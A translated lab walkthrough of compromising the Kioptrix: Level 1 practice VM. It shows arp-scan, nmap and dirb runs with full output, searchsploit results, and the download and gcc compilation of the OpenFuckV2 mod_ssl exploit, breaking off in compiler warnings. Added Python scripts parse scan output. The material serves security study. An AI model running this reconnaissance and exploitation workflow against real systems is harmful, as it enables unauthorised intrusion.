The material here is learned from Bilibili uploader 泷羽sec; if this infringes any rights, the article will be taken down immediately.
These notes are only meant to help fellow practitioners learn. The sites below are used purely for study; nothing else is connected to me. Do not cross the legal red line, or you bear the consequences yourself.
Changing the VM's network mode
The Kioptrix: Level 1 VM ships with its network mode set to bridged. In some situations you will want to change it to NAT; the steps are:
- Shut down the Kioptrix: Level 1 VM and remove its network adapter in VMware.
- Remove the VM from VMware (from the library only, not from disk).
- Browse to the location of the Kioptrix: Level 1 VM's VMX file and open it in a text editor.
- Delete every entry that starts with "ethernet0" and save the changes.
- Re-import the VM, then add a new network adapter and set its mode to NAT.
Discovering the target's IP address
arp-scan -l: performs an ARP scan of the local network to discover the devices connected to the same segment. It sends ARP requests (Address Resolution Protocol) across the LAN and lists the hosts that respond. The -l option detects the local subnet automatically and scans it.
First run the command above with the target VM powered off, then power it on and scan again; comparing the two results reveals the target's IP.
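The before/after comparison described above, as an added example that is not part of the original post: it parses two arp-scan runs (target VM off, then on) and reports the hosts that only appear in the second run, plus any IP whose MAC changed between runs. Both scan outputs are constructed samples; only the VMware MAC 00:0C:29:BE:E9:FC is taken from the post's nmap output.

```python
"""Added example (not from the original post): diff two `arp-scan -l` runs,
one with the target VM powered off and one with it on, and report hosts that
appear only in the second run. Both outputs are constructed samples; the
VMware MAC 00:0C:29:BE:E9:FC is the one nmap reported in the post."""
import re

# arp-scan host lines look like: IP <tab> MAC <tab> vendor text
HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F:]{17})\s*(.*)$")

SCAN_VM_OFF = """Interface: eth0, type: EN10MB, MAC: 00:0c:29:11:22:33, IPv4: 192.168.159.131
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.159.1\t00:50:56:c0:00:08\tVMware, Inc.
192.168.159.2\t00:50:56:ee:aa:01\tVMware, Inc.
192.168.159.254\t00:50:56:f9:77:02\tVMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
"""

SCAN_VM_ON = """Interface: eth0, type: EN10MB, MAC: 00:0c:29:11:22:33, IPv4: 192.168.159.131
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.159.1\t00:50:56:c0:00:08\tVMware, Inc.
192.168.159.2\t00:50:56:ee:aa:01\tVMware, Inc.
192.168.159.138\t00:0c:29:be:e9:fc\tVMware, Inc.
192.168.159.254\t00:50:56:f9:77:02\tVMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
"""

def parse_arp_scan(text):
    """Map each responding IP to (mac, vendor); header and summary lines are skipped."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            hosts[m.group(1)] = (m.group(2).lower(), m.group(3).strip())
    return hosts

def _ip_key(ip):
    """Sort key so 192.168.159.138 sorts numerically, not lexically."""
    return tuple(int(part) for part in ip.split("."))

def compare_scans(before, after):
    """Return (new_hosts, changed_macs): hosts present only in `after`, and IPs
    whose MAC differs between the runs (a lease reused by another machine)."""
    old, new = parse_arp_scan(before), parse_arp_scan(after)
    new_hosts = sorted(((ip, mac, vendor) for ip, (mac, vendor) in new.items()
                        if ip not in old), key=lambda t: _ip_key(t[0]))
    changed = sorted(((ip, old[ip][0], new[ip][0]) for ip in old
                      if ip in new and old[ip][0] != new[ip][0]), key=lambda t: _ip_key(t[0]))
    return new_hosts, changed

if __name__ == "__main__":
    fresh, moved = compare_scans(SCAN_VM_OFF, SCAN_VM_ON)
    for ip, mac, vendor in fresh:
        print(f"new host {ip} {mac} ({vendor})")
    for ip, was, now in moved:
        print(f"{ip} changed MAC {was} -> {now}")
```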
Browsing the site at that IP for information gathering
Links or addresses found on the site are worth visiting; they may reveal something.
Port scanning with nmap
Command:
nmap -p- 192.168.159.138
Fingerprinting
nmap 192.168.159.138 -p 22,80,111,139,443,1024 -sV -sC -O --version-all
Command breakdown:
- Target: scan the IP address 192.168.159.138.
- Port scan: scan the specified ports 22, 80, 111, 139, 443 and 1024.
- Service version detection (-sV): identify the services running on these ports and their versions.
- Default script scan (-sC): run Nmap's built-in default scripts for common vulnerability and security checks.
- OS detection (-O): attempt to determine the target's operating system.
- Exhaustive version detection (--version-all): try every version probe against each service to obtain as much information as possible.
Note: information that shows up repeatedly is very likely to be vulnerable.
┌──(root㉿root)-[~]
└─# nmap 192.168.159.138 -p 22,80,111,139,443,1024 -sV -sC -O --version-all
Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-08 21:26 CST
Nmap scan report for 192.168.159.138
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1)
| 1024 8f8e5b81ed21abc180e157a33c85c471 (DSA)
|_ 1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2024-12-08T14:28:58+00:00; +1h01m50s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:BE:E9:FC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1h01m49s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.48 seconds
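As an added example (not part of the original post), the following script triages a report like the one above: it flags the legacy-protocol lines (SSHv1, SSLv2, TRACE), compares the certificate expiry with the scan date, and lists product/version strings that repeat across ports, which is the "repeated information" heuristic above made mechanical. The input is a constructed excerpt of the scan output shown above.

```python
"""Added example (not from the original post): triage an `nmap -sV -sC` report
the way the note above suggests, flagging legacy protocol exposures, an expired
certificate and product/version strings that repeat across ports. The sample
below is a constructed excerpt of the scan output shown in the post."""
import re
from datetime import datetime

SAMPLE = """Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-08 21:26 CST
Nmap scan report for 192.168.159.138
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
| sslv2:
|_ SSLv2 supported
"""

START_RE = re.compile(r"^Starting Nmap .* at (\d{4}-\d{2}-\d{2})")
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+open\s+(\S+)\s*(.*)$")
EXPIRY_RE = re.compile(r"^Not valid after:\s*(\d{4}-\d{2}-\d{2})")
PRODUCT_RE = re.compile(r"\b([A-Za-z][\w-]*)/(\d[\w.]*)")   # e.g. OpenSSL/0.9.6b
# Script output lines that indicate a legacy protocol or risky feature is enabled
RULES = [
    ("Server supports SSHv1", "SSH protocol 1 enabled"),
    ("SSLv2 supported", "SSLv2 enabled"),
    ("Potentially risky methods: TRACE", "HTTP TRACE method enabled"),
]

def parse_report(text):
    """Return (scan_date, {port: {"service", "version", "script": [lines]}})."""
    scan_date, ports, cur = None, {}, None
    for line in text.splitlines():
        if m := START_RE.match(line):
            scan_date = datetime.strptime(m.group(1), "%Y-%m-%d").date()
        elif m := PORT_RE.match(line):
            cur = m.group(1)
            ports[cur] = {"service": m.group(2), "version": m.group(3), "script": []}
        elif cur and line.startswith("|"):
            ports[cur]["script"].append(line.lstrip("|_ ").strip())  # drop NSE tree prefix
    return scan_date, ports

def shared_products(ports):
    """Product/version tokens seen on more than one port, e.g. OpenSSL/0.9.6b -> [80/tcp, 443/tcp]."""
    seen = {}
    for port, info in ports.items():
        for line in [info["version"], *info["script"]]:
            for name, ver in PRODUCT_RE.findall(line):
                seen.setdefault(f"{name}/{ver}", set()).add(port)
    return {tok: sorted(p, key=lambda s: int(s.split("/")[0]))
            for tok, p in seen.items() if len(p) > 1}

def triage(text):
    """Return a list of (port, finding) pairs worth a closer look."""
    scan_date, ports = parse_report(text)
    findings = []
    for port, info in ports.items():
        for line in info["script"]:
            findings += [(port, msg) for needle, msg in RULES if needle in line]
            if (m := EXPIRY_RE.match(line)) and scan_date:
                expiry = datetime.strptime(m.group(1), "%Y-%m-%d").date()
                if expiry < scan_date:
                    findings.append((port, f"certificate expired on {expiry}"))
    for tok, plist in shared_products(ports).items():
        findings.append((",".join(plist), f"{tok} exposed on several ports"))
    return findings
```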
Vulnerability detection with nmap
nmap 192.168.159.138 -p 22,80,111,139,443,1024 --script=vuln
Command breakdown:
- Target: scan the IP address 192.168.159.138.
- Ports: 22 (SSH), 80 (HTTP), 111 (RPC), 139 (NetBIOS), 443 (HTTPS) and 1024 (a common high port).
- Vulnerability scan: run Nmap's built-in vuln category of scripts to check the target for known vulnerabilities.
┌──(root㉿root)-[~]
└─# nmap 192.168.159.138 -p 22,80,111,139,443,1024 --script=vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-08 21:36 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.159.138
Host is up (0.00056s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
| http-enum:
| /test.php: Test page
| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_ /usage/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.cvedetails.com/cve/2014-0224
|_ http://www.openssl.org/news/secadv_20140605.txt
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://www.securityfocus.com/bid/70574
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: CVE:CVE-2015-4000 BID:74733
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://www.securityfocus.com/bid/74733
| https://weakdh.org
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
1024/tcp open kdm
MAC Address: 00:0C:29:BE:E9:FC (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
Nmap done: 1 IP address (1 host up) scanned in 340.54 seconds
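An added example (not part of the original post) that turns `--script=vuln` output like the above into structured records: one record per VULNERABLE finding with its port, script, title, risk, disclosure date and CVE IDs, plus the list of scripts that failed to run (two of them did above). The input is a constructed excerpt of the scan output shown above, and the parser handles the ssl-dh-params case where a single script block reports two findings.

```python
"""Added example (not from the original post): parse `--script=vuln` output
into one record per VULNERABLE finding plus the scripts that failed to run.
The sample is a constructed excerpt of the post's scan; it includes the
ssl-dh-params block that reports two findings under one script."""
import re

SAMPLE = """443/tcp open https
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: CVE:CVE-2015-4000 BID:74733
| Disclosure date: 2015-5-19
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
|_ https://weakdh.org
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
|_ IDs: CVE:CVE-2009-3103
"""

PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+open\b")
SCRIPT_RE = re.compile(r"^([a-z0-9]+(?:-[a-z0-9]+)+):\s*(.*)$")   # e.g. ssl-poodle:
KEY_RE = re.compile(r"^(State|IDs|Risk factor|Disclosure date):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
FIELDS = {"Risk factor": "risk", "Disclosure date": "disclosure"}

def parse_vuln_scan(text):
    """Return (records, errors): one dict per finding, and (port, script) pairs
    for scripts whose execution failed. CVEs are collected from any line of a finding."""
    records, errors = [], []
    port = script = rec = None
    prev = ""                       # last free-text line, used as the finding title
    for raw in text.splitlines():
        if (m := PORT_RE.match(raw)) or raw.startswith("Host script results"):
            port, rec = (m.group(1) if m else "host"), None
            continue
        if not raw.startswith("|"):
            continue
        body = raw.lstrip("|_ ").strip()        # strip the NSE tree prefix
        if m := SCRIPT_RE.match(body):          # a new script's output starts
            script, rec, prev = m.group(1), None, ""
            if "ERROR: Script execution failed" in m.group(2):
                errors.append((port, script))
            continue
        key = KEY_RE.match(body)
        if key and key.group(1) == "State":     # every State: line opens a finding
            rec = {"port": port, "script": script, "title": prev, "state": key.group(2),
                   "risk": None, "disclosure": None, "cves": set()}
            records.append(rec)
        elif key and rec and key.group(1) == "IDs":
            rec["cves"].update(CVE_RE.findall(key.group(2)))
        elif key and rec:
            rec[FIELDS[key.group(1)]] = key.group(2)
        elif rec:                               # reference URLs, check results, etc.
            rec["cves"].update(CVE_RE.findall(body))
        if body and not key:
            prev = body
    for rec in records:
        rec["cves"] = sorted(rec["cves"])
    return records, errors
```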
Directory enumeration with dirb
dirb http://192.168.159.138/
┌──(root㉿root)-[~]
└─# dirb http://192.168.159.138/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 8 21:43:27 2024
URL_BASE: http://192.168.159.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.159.138/ ----
+ http://192.168.159.138/~operator (CODE:403|SIZE:273)
+ http://192.168.159.138/~root (CODE:403|SIZE:269)
+ http://192.168.159.138/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.159.138/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.159.138/manual/
==> DIRECTORY: http://192.168.159.138/mrtg/
==> DIRECTORY: http://192.168.159.138/usage/
---- Entering directory: http://192.168.159.138/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.159.138/mrtg/ ----
+ http://192.168.159.138/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://192.168.159.138/usage/ ----
+ http://192.168.159.138/usage/index.html (CODE:200|SIZE:4253)
-----------------
END_TIME: Sun Dec 8 21:43:52 2024
DOWNLOADED: 13836 - FOUND: 6
Sensitive directories
http://192.168.159.138/manual/
http://192.168.159.138/mrtg/
http://192.168.159.138/usage/
http://192.168.159.138/usage/index.html
Look through the files in these directories for any information leakage.
Finding related vulnerabilities and exploits with searchsploit
The nmap vulnerability scan output showed Apache 1.3.20.
searchsploit Apache 1.3.20
┌──(root㉿root)-[~]
└─# searchsploit Apache 1.3.20
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Rem | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code | php/remote/29316.py
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File | windows/remote/21204.txt
Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Roo | windows/remote/19975.pl
Apache 1.3.x < 2.0.48 mod_userdir - Remote Us | linux/remote/132.c
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Re | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Int | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory L | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Executio | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of S | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/764.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLo | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execut | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Lis | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Tra | multiple/remote/6229.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Tra | unix/remote/14489.c
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8 | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8 | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denial o | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerc | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local Fil | linux/remote/34.pl
---------------------------------------------- ---------------------------------
Shellcodes: No Results
An AI assistant can help analyse which of these exploits are applicable.
A mod_ssl exploit stands out.
searchsploit mod_ssl
┌──(root㉿root)-[~]
└─# searchsploit mod_ssl
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Servi | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Bu | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-bet | unix/remote/40347.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
DoS entries can be ruled out here, because the end result of a DoS vulnerability is similar to a DDoS: it just takes the server down.
It is recommended to try all of the others. Download them from https://www.exploit-db.com/
Search for mod_ssl
Download "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)"
Copy the downloaded file into Kali.
gcc -o 470 47080.c (this is a C exploit, so it has to be compiled: gcc compiles the source, -o 470 names the output binary 470, and 47080.c is the file to compile)
Run
gcc -o 470 47080.c -lcrypto (-lcrypto needs the OpenSSL development package, which may require switching apt sources; install it with sudo apt-get install libssl-dev)
┌──(root㉿root)-[~/桌面]
└─# gcc -o 470 47080.c -lcrypto
47080.c: In function ‘read_ssl_packet’:
47080.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
534 | RC4(ssl->rc4_read_key, rec_len, buf, buf);
| ^~~
In file included from 47080.c:26:
/usr/include/openssl/rc4.h:37:28: note: declared here
37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
| ^~~
47080.c: In function ‘send_ssl_packet’:
47080.c:583:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
583 | MD5_Init(&ctx);
| ^~~~~~~~
In file included from 47080.c:27:
/usr/include/openssl/md5.h:49:27: note: declared here
49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
| ^~~~~~~~
47080.c:584:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
584 | MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:585:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
585 | MD5_Update(&ctx, rec, rec_len);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:586:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
586 | MD5_Update(&ctx, &seq, 4);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:587:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
587 | MD5_Final(p, &ctx);
| ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
| ^~~~~~~~~
47080.c:594:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
594 | RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
| ^~~
/usr/include/openssl/rc4.h:37:28: note: declared here
37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
| ^~~
47080.c: In function ‘send_client_master_key’:
47080.c:748:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
748 | if (EVP_PKEY_get1_RSA(pkey) == NULL) {
| ^~
In file included from /usr/include/openssl/x509.h:29,
from /usr/include/openssl/ssl.h:32,
from 47080.c:21:
/usr/include/openssl/evp.h:1358:16: note: declared here
1358 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
| ^~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘RSA_public_encrypt’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
754 | encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
| ^~~~~~~~~~~~~~~~~~~~
In file included from /usr/include/openssl/x509.h:36:
/usr/include/openssl/rsa.h:293:5: note: declared here
293 | int RSA_public_encrypt(int flen, const unsigned char *from, unsigned char *to,
| ^~~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
754 | encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
| ^~~~~~~~~~~~~~~~~~~~
/usr/include/openssl/evp.h:1358:16: note: declared here
1358 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
| ^~~~~~~~~~~~~~~~~
47080.c: In function ‘generate_key_material’:
47080.c:791:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
791 | MD5_Init(&ctx);
| ^~~~~~~~
/usr/include/openssl/md5.h:49:27: note: declared here
49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
| ^~~~~~~~
47080.c:793:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
793 | MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:794:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
